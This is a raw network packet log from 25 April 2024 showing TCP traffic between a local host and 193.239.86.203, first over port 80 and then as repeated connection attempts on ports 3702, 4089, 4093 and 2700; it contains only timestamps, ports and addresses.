Apr 25, 2024 21:36:48.692958117 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.692970991 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.692996025 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.693008900 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.693033934 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.693047047 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.693072081 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.693087101 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.693110943 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.693125963 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.693150997 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.693161011 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.693187952 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.693203926 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.693221092 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.693240881 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.995452881 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.995498896 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.995537043 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.995569944 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.995589972 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.995611906 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.995628119 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.995657921 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.995666981 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.995704889 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.995714903 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.995738983 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.995775938 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.995964050 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.996015072 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.996032953 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.996068001 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.996120930 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.996871948 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.996936083 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.996956110 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.996990919 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.997011900 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.997795105 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.997874022 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.997884989 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.997920036 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.997940063 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.998091936 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.998145103 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.998203039 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.998258114 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.998374939 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.998424053 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.998461008 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.998497009 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.998523951 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.998744965 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.998800039 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.998821020 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.998861074 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.998874903 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.998902082 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.998918056 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.998949051 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.998961926 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.999007940 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.999057055 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.999089956 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.999106884 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.999193907 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.999248981 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.999362946 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.999413967 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.999541998 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.999583006 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.999634027 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.999634981 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.999644041 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.999700069 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.999767065 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.999835014 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.999881983 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.999933958 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.000014067 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000053883 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000070095 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.000134945 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.000138044 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000180006 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000201941 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.000217915 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000221968 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.000257015 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000273943 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.000310898 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.000332117 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000365973 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000386953 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.000550032 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000606060 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.000622988 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000674963 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.000694990 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000734091 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000747919 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.000785112 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.000808001 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000845909 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000861883 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.000896931 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.000936031 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000973940 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.000989914 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001080036 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001084089 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001120090 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001132965 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001161098 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001174927 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001204014 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001231909 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001241922 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001255989 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001281023 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001291990 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001319885 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001332998 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001358032 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001374960 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001399040 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001419067 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001437902 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001455069 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001477003 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001490116 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001516104 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001530886 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001555920 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001571894 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001595974 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001607895 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001637936 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001651049 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001677036 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001683950 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001713991 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001732111 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001754045 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001768112 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001792908 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001807928 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001832008 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001842022 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001869917 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001878977 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001908064 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001924038 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001943111 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.001960039 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.001981974 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002021074 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002034903 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002059937 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002074957 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002099991 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002115965 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002140045 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002151966 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002180099 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002193928 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002233982 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002254009 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002306938 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002357960 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002415895 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002429962 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002469063 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002484083 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002526045 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002540112 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002578020 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002584934 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002625942 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002650023 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002702951 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002753973 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002793074 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002809048 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002850056 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002898932 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002938986 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002960920 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.002978086 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.002985954 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003016949 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003031969 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003056049 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003073931 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003094912 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003109932 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003134012 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003150940 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003175974 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003187895 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003222942 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003248930 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003282070 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003298044 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003390074 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003427982 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003437042 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003479958 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003501892 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003540039 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003554106 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003576994 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003587961 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003617048 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003627062 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003654957 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003669024 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003695965 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003707886 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003748894 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003768921 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003808975 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003833055 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003845930 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003854990 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003885984 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003890038 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003923893 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003938913 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.003964901 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.003977060 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004012108 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004036903 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004084110 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004133940 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004173040 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004183054 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004210949 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004230022 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004251003 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004259109 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004291058 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004298925 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004328966 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004334927 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004375935 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004404068 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004442930 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004453897 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004482031 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004493952 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004520893 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004528999 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004560947 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004571915 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004600048 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004612923 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004640102 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004647970 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004679918 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004693985 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004718065 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004729033 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004756927 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004771948 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004796028 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004812002 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004829884 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004854918 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004868984 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004911900 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004928112 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004956961 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.004981995 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.004992008 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.005006075 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.005012035 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.005029917 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.005037069 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.005053043 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.005054951 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.005072117 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.005093098 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.005104065 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.005122900 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.005150080 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.005168915 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.005218983 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.005234957 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.005268097 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.005523920 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.005558014 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:49.005575895 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:49.005615950 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:51.657743931 CEST	49736	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:51.968688011 CEST	3702	49736	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:52.480518103 CEST	49736	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:52.791435957 CEST	3702	49736	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:53.308617115 CEST	49736	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:53.619673014 CEST	3702	49736	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:54.121134043 CEST	49736	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:54.432153940 CEST	3702	49736	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:54.933614016 CEST	49736	3702	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:55.244522095 CEST	3702	49736	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:55.245976925 CEST	49738	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:55.561155081 CEST	4089	49738	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:56.074242115 CEST	49738	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:56.389208078 CEST	4089	49738	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:56.902400017 CEST	49738	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:57.217466116 CEST	4089	49738	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:57.777364016 CEST	49738	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:58.092783928 CEST	4089	49738	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:58.777388096 CEST	49738	4089	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:59.092420101 CEST	4089	49738	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:59.093852997 CEST	49739	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:59.404936075 CEST	4093	49739	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:59.980535030 CEST	49739	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:00.291771889 CEST	4093	49739	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:00.793032885 CEST	49739	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:01.104062080 CEST	4093	49739	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:01.605515003 CEST	49739	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:01.916457891 CEST	4093	49739	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:02.420609951 CEST	49739	4093	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:02.731599092 CEST	4093	49739	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:02.732846975 CEST	49740	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:03.040018082 CEST	2700	49740	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:03.543219090 CEST	49740	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:03.850140095 CEST	2700	49740	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:04.355539083 CEST	49740	2700	192.168.2.4	193.239.86.203
Apr 25, 2024 21:37:04.662631035 CEST	2700	49740	193.239.86.203	192.168.2.4
Apr 25, 2024 21:37:05.168024063 CEST	49740	2700	192.168.2.4	193.239.86.203
